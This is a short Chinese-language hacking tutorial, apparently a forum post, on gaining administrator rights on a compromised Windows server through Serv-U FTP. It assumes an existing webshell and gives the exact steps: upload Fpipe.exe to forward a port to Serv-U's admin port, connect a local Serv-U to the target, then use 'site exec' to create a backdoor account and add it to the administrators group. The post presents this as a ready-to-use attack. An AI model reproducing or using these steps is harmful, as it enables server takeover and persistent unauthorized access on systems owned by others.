前面有朋友问到。如果说Serv-u的目录没有修改权限怎么办 

这里也给大家做下解答。 如果说serv-u服务器没有修改权限的话。

那么我就需要做下端口转发，与前面的讲的lxc的转发一样,不同的只是转发的端口不一样。

前面是将其他端口转发到3389的端口上。可是这里要用到的是将其他端口映射到43958端口上 具体什么端口可以随意 只要不占用。

方法如下：

1.查看SERV-U是否有可读可写可修改权限

2.如果没有 考虑用SERV-U来端口转发

3.上传cmd.exe和Fpipe.exe进行端口转发 运行一下命令:

Fpipe.exe -v -l 44959 -r 43958 127.0.0.1

(这里webshell必须要有dos权限,也就是要可以运行CMD命令)

4.本机搭建SERV-U 端口为：45959 IP地址为 提权目标IP 账户为默认的

5.本机cmd链接FTP 运行一下命令

Quote site exec net user heishou 1234567 /add
Quote site exec net localgroup administrators heishou /add
(因为前面我们以前做了端口转发所以现在我们本地的serv-u就相当于服务器上的serv-u)

6.如果命令运行不成功 也就是说管理员删除了net程序 那么我们就给他上传一个net程序

这篇文章希望能够给大家带来帮助,另外恭祝大家，提权提到手抽筋。。。